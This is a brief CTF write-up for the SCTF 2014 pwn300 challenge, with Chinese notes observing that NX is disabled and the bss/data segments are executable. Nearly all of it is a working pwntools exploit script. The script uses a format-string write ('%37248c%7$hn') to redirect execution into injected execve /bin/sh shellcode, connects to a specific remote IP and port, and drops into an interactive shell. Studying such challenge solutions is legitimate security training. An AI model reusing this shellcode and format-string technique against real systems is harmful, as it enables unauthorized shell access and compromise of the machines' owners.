sctf 2014 pwn300

关键：nx没开， cat /proc/[pid]/maps bss,data所属段可执行
 from pwn import *
shellcode="\x31\xc0\x31\xd2\x31\xdb\x31\xc9\x31\xc0\x31\xd2\x52\x68\x2f\x2f" \
                 "\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\x31\xc0\xb0" \
                "\x0b\xcd\x80\n"
p=remote("218.2.197.235",10102)
print p.readuntil("input your choice:\n")
p.sendline('2')
print p.readuntil("input your message\n")
payload="\x20\x91\x04\x08"
payload+="%37248c%7$hn"
p.sendline(payload)
p.readuntil("input your choice:\n")
p.sendline("3")
p.readuntil("input your choice:\n")
p.sendline("2")
p.readuntil("input your message\n")
p.send(shellcode)

p.readuntil("input your choice:\n")
p.sendline("4")

p.interactive()

贴个pwntool formatstring的bug图片